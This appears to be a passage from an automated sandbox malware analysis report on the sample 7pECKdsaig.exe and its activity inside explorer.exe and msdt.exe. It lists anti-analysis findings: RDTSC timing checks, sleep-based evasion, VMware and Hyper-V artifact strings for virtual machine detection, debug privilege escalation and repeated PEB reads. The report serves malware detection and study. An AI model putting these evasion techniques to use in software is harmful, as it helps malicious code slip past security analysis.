Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000000589904 second address: 000000000058990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000000589B6E second address: 0000000000589B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Found decision node followed by non-executed suspicious APIs
Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A89AA0 rdtsc 0_2_00A89AA0
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 865 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\msdt.exe API coverage: 9.7 %
Source: C:\Users\user\Desktop\7pECKdsaig.exe Process information queried: ProcessInformation Jump to behavior
Source: explorer.exe, 00000001.00000003.289061192.00000000084D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000003.461296315.000000000683A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.263735895.00000000081DD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
Source: explorer.exe, 00000001.00000002.523833052.0000000006710000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: explorer.exe, 00000001.00000003.461216185.000000000F53F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.530259036.000000000F54E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
Source: explorer.exe, 00000001.00000000.263735895.0000000008304000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000001.00000003.462488828.00000000084D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @%SystemRoot%\System32\mswsock.dll,-60101a0%SystemRoot%\system32\mswsock.dll-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir~
Source: explorer.exe, 00000001.00000000.263735895.00000000082B2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
Source: explorer.exe, 00000001.00000002.525713546.00000000082B2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000001.00000002.525713546.0000000008200000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A89AA0 rdtsc 0_2_00A89AA0
Enables debug privileges
Source: C:\Users\user\Desktop\7pECKdsaig.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171B171 mov eax, dword ptr fs:[00000030h] 0_2_0171B171
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171B171 mov eax, dword ptr fs:[00000030h] 0_2_0171B171
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171C962 mov eax, dword ptr fs:[00000030h] 0_2_0171C962
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0173B944 mov eax, dword ptr fs:[00000030h] 0_2_0173B944
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0173B944 mov eax, dword ptr fs:[00000030h] 0_2_0173B944
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174513A mov eax, dword ptr fs:[00000030h] 0_2_0174513A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174513A mov eax, dword ptr fs:[00000030h] 0_2_0174513A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01734120 mov eax, dword ptr fs:[00000030h] 0_2_01734120
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01734120 mov eax, dword ptr fs:[00000030h] 0_2_01734120
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01734120 mov eax, dword ptr fs:[00000030h] 0_2_01734120
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01734120 mov eax, dword ptr fs:[00000030h] 0_2_01734120
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01734120 mov ecx, dword ptr fs:[00000030h] 0_2_01734120
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01719100 mov eax, dword ptr fs:[00000030h] 0_2_01719100
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01719100 mov eax, dword ptr fs:[00000030h] 0_2_01719100
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01719100 mov eax, dword ptr fs:[00000030h] 0_2_01719100
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171B1E1 mov eax, dword ptr fs:[00000030h] 0_2_0171B1E1
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171B1E1 mov eax, dword ptr fs:[00000030h] 0_2_0171B1E1
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171B1E1 mov eax, dword ptr fs:[00000030h] 0_2_0171B1E1
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017A41E8 mov eax, dword ptr fs:[00000030h] 0_2_017A41E8
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017951BE mov eax, dword ptr fs:[00000030h] 0_2_017951BE
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017951BE mov eax, dword ptr fs:[00000030h] 0_2_017951BE
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017951BE mov eax, dword ptr fs:[00000030h] 0_2_017951BE
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017951BE mov eax, dword ptr fs:[00000030h] 0_2_017951BE
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017461A0 mov eax, dword ptr fs:[00000030h] 0_2_017461A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017461A0 mov eax, dword ptr fs:[00000030h] 0_2_017461A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017969A6 mov eax, dword ptr fs:[00000030h] 0_2_017969A6
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01742990 mov eax, dword ptr fs:[00000030h] 0_2_01742990
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174A185 mov eax, dword ptr fs:[00000030h] 0_2_0174A185
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0173C182 mov eax, dword ptr fs:[00000030h] 0_2_0173C182
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E1074 mov eax, dword ptr fs:[00000030h] 0_2_017E1074
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017D2073 mov eax, dword ptr fs:[00000030h] 0_2_017D2073
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01730050 mov eax, dword ptr fs:[00000030h] 0_2_01730050
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01730050 mov eax, dword ptr fs:[00000030h] 0_2_01730050
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172B02A mov eax, dword ptr fs:[00000030h] 0_2_0172B02A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172B02A mov eax, dword ptr fs:[00000030h] 0_2_0172B02A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172B02A mov eax, dword ptr fs:[00000030h] 0_2_0172B02A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172B02A mov eax, dword ptr fs:[00000030h] 0_2_0172B02A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174002D mov eax, dword ptr fs:[00000030h] 0_2_0174002D
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174002D mov eax, dword ptr fs:[00000030h] 0_2_0174002D
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174002D mov eax, dword ptr fs:[00000030h] 0_2_0174002D
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174002D mov eax, dword ptr fs:[00000030h] 0_2_0174002D
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174002D mov eax, dword ptr fs:[00000030h] 0_2_0174002D
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E4015 mov eax, dword ptr fs:[00000030h] 0_2_017E4015
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E4015 mov eax, dword ptr fs:[00000030h] 0_2_017E4015
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01797016 mov eax, dword ptr fs:[00000030h] 0_2_01797016
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01797016 mov eax, dword ptr fs:[00000030h] 0_2_01797016
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01797016 mov eax, dword ptr fs:[00000030h] 0_2_01797016
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017158EC mov eax, dword ptr fs:[00000030h] 0_2_017158EC
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017AB8D0 mov eax, dword ptr fs:[00000030h] 0_2_017AB8D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017AB8D0 mov ecx, dword ptr fs:[00000030h] 0_2_017AB8D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017AB8D0 mov eax, dword ptr fs:[00000030h] 0_2_017AB8D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017AB8D0 mov eax, dword ptr fs:[00000030h] 0_2_017AB8D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017AB8D0 mov eax, dword ptr fs:[00000030h] 0_2_017AB8D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017AB8D0 mov eax, dword ptr fs:[00000030h] 0_2_017AB8D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174F0BF mov ecx, dword ptr fs:[00000030h] 0_2_0174F0BF
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174F0BF mov eax, dword ptr fs:[00000030h] 0_2_0174F0BF
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174F0BF mov eax, dword ptr fs:[00000030h] 0_2_0174F0BF
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017420A0 mov eax, dword ptr fs:[00000030h] 0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017420A0 mov eax, dword ptr fs:[00000030h] 0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017420A0 mov eax, dword ptr fs:[00000030h] 0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017420A0 mov eax, dword ptr fs:[00000030h] 0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017420A0 mov eax, dword ptr fs:[00000030h] 0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017420A0 mov eax, dword ptr fs:[00000030h] 0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017590AF mov eax, dword ptr fs:[00000030h] 0_2_017590AF
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01719080 mov eax, dword ptr fs:[00000030h] 0_2_01719080
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01793884 mov eax, dword ptr fs:[00000030h] 0_2_01793884
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01793884 mov eax, dword ptr fs:[00000030h] 0_2_01793884
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01743B7A mov eax, dword ptr fs:[00000030h] 0_2_01743B7A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01743B7A mov eax, dword ptr fs:[00000030h] 0_2_01743B7A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171DB60 mov ecx, dword ptr fs:[00000030h] 0_2_0171DB60
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E8B58 mov eax, dword ptr fs:[00000030h] 0_2_017E8B58
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171F358 mov eax, dword ptr fs:[00000030h] 0_2_0171F358
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171DB40 mov eax, dword ptr fs:[00000030h] 0_2_0171DB40
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017D131B mov eax, dword ptr fs:[00000030h] 0_2_017D131B
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017403E2 mov eax, dword ptr fs:[00000030h] 0_2_017403E2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017403E2 mov eax, dword ptr fs:[00000030h] 0_2_017403E2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017403E2 mov eax, dword ptr fs:[00000030h] 0_2_017403E2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017403E2 mov eax, dword ptr fs:[00000030h] 0_2_017403E2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017403E2 mov eax, dword ptr fs:[00000030h] 0_2_017403E2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017403E2 mov eax, dword ptr fs:[00000030h] 0_2_017403E2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0173DBE9 mov eax, dword ptr fs:[00000030h] 0_2_0173DBE9
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017953CA mov eax, dword ptr fs:[00000030h] 0_2_017953CA
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017953CA mov eax, dword ptr fs:[00000030h] 0_2_017953CA
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01744BAD mov eax, dword ptr fs:[00000030h] 0_2_01744BAD
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01744BAD mov eax, dword ptr fs:[00000030h] 0_2_01744BAD
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01744BAD mov eax, dword ptr fs:[00000030h] 0_2_01744BAD
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E5BA5 mov eax, dword ptr fs:[00000030h] 0_2_017E5BA5
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01742397 mov eax, dword ptr fs:[00000030h] 0_2_01742397
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174B390 mov eax, dword ptr fs:[00000030h] 0_2_0174B390
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017D138A mov eax, dword ptr fs:[00000030h] 0_2_017D138A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017CD380 mov ecx, dword ptr fs:[00000030h] 0_2_017CD380
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01721B8F mov eax, dword ptr fs:[00000030h] 0_2_01721B8F
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01721B8F mov eax, dword ptr fs:[00000030h] 0_2_01721B8F
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0175927A mov eax, dword ptr fs:[00000030h] 0_2_0175927A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017CB260 mov eax, dword ptr fs:[00000030h] 0_2_017CB260
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017CB260 mov eax, dword ptr fs:[00000030h] 0_2_017CB260
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E8A62 mov eax, dword ptr fs:[00000030h] 0_2_017E8A62
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017DEA55 mov eax, dword ptr fs:[00000030h] 0_2_017DEA55
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017A4257 mov eax, dword ptr fs:[00000030h] 0_2_017A4257
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01719240 mov eax, dword ptr fs:[00000030h] 0_2_01719240
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01719240 mov eax, dword ptr fs:[00000030h] 0_2_01719240
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01719240 mov eax, dword ptr fs:[00000030h] 0_2_01719240
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01719240 mov eax, dword ptr fs:[00000030h] 0_2_01719240
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01754A2C mov eax, dword ptr fs:[00000030h] 0_2_01754A2C
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01754A2C mov eax, dword ptr fs:[00000030h] 0_2_01754A2C
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01715210 mov eax, dword ptr fs:[00000030h] 0_2_01715210
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01715210 mov ecx, dword ptr fs:[00000030h] 0_2_01715210
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01715210 mov eax, dword ptr fs:[00000030h] 0_2_01715210
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01715210 mov eax, dword ptr fs:[00000030h] 0_2_01715210
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171AA16 mov eax, dword ptr fs:[00000030h] 0_2_0171AA16
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171AA16 mov eax, dword ptr fs:[00000030h] 0_2_0171AA16
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017DAA16 mov eax, dword ptr fs:[00000030h] 0_2_017DAA16
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017DAA16 mov eax, dword ptr fs:[00000030h] 0_2_017DAA16
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01733A1C mov eax, dword ptr fs:[00000030h] 0_2_01733A1C
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01728A0A mov eax, dword ptr fs:[00000030h] 0_2_01728A0A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01742AE4 mov eax, dword ptr fs:[00000030h] 0_2_01742AE4
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01742ACB mov eax, dword ptr fs:[00000030h] 0_2_01742ACB
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172AAB0 mov eax, dword ptr fs:[00000030h] 0_2_0172AAB0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172AAB0 mov eax, dword ptr fs:[00000030h] 0_2_0172AAB0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174FAB0 mov eax, dword ptr fs:[00000030h] 0_2_0174FAB0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017152A5 mov eax, dword ptr fs:[00000030h] 0_2_017152A5
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017152A5 mov eax, dword ptr fs:[00000030h] 0_2_017152A5
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017152A5 mov eax, dword ptr fs:[00000030h] 0_2_017152A5
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017152A5 mov eax, dword ptr fs:[00000030h] 0_2_017152A5
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017152A5 mov eax, dword ptr fs:[00000030h] 0_2_017152A5
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174D294 mov eax, dword ptr fs:[00000030h] 0_2_0174D294
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174D294 mov eax, dword ptr fs:[00000030h] 0_2_0174D294
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0173C577 mov eax, dword ptr fs:[00000030h] 0_2_0173C577
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0173C577 mov eax, dword ptr fs:[00000030h] 0_2_0173C577
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01737D50 mov eax, dword ptr fs:[00000030h] 0_2_01737D50
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01753D43 mov eax, dword ptr fs:[00000030h] 0_2_01753D43
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01793540 mov eax, dword ptr fs:[00000030h] 0_2_01793540
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171AD30 mov eax, dword ptr fs:[00000030h] 0_2_0171AD30
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017DE539 mov eax, dword ptr fs:[00000030h] 0_2_017DE539
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01723D34 mov eax, dword ptr fs:[00000030h] 0_2_01723D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E8D34 mov eax, dword ptr fs:[00000030h] 0_2_017E8D34
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0179A537 mov eax, dword ptr fs:[00000030h] 0_2_0179A537
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01744D3B mov eax, dword ptr fs:[00000030h] 0_2_01744D3B
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01744D3B mov eax, dword ptr fs:[00000030h] 0_2_01744D3B
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01744D3B mov eax, dword ptr fs:[00000030h] 0_2_01744D3B
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017C8DF1 mov eax, dword ptr fs:[00000030h] 0_2_017C8DF1
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172D5E0 mov eax, dword ptr fs:[00000030h] 0_2_0172D5E0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172D5E0 mov eax, dword ptr fs:[00000030h] 0_2_0172D5E0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017DFDE2 mov eax, dword ptr fs:[00000030h] 0_2_017DFDE2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017DFDE2 mov eax, dword ptr fs:[00000030h] 0_2_017DFDE2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017DFDE2 mov eax, dword ptr fs:[00000030h] 0_2_017DFDE2
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017DFDE2 mov eax, dword ptr fs:[00000030h] 0_2_017DFDE2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h] 2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h] 2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h] 2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h] 2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h] 2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AF20A0 mov eax, dword ptr fs:[00000030h] 2_2_04AF20A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFF0BF mov ecx, dword ptr fs:[00000030h] 2_2_04AFF0BF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFF0BF mov eax, dword ptr fs:[00000030h] 2_2_04AFF0BF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04AFF0BF mov eax, dword ptr fs:[00000030h] 2_2_04AFF0BF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B090AF mov eax, dword ptr fs:[00000030h] 2_2_04B090AF
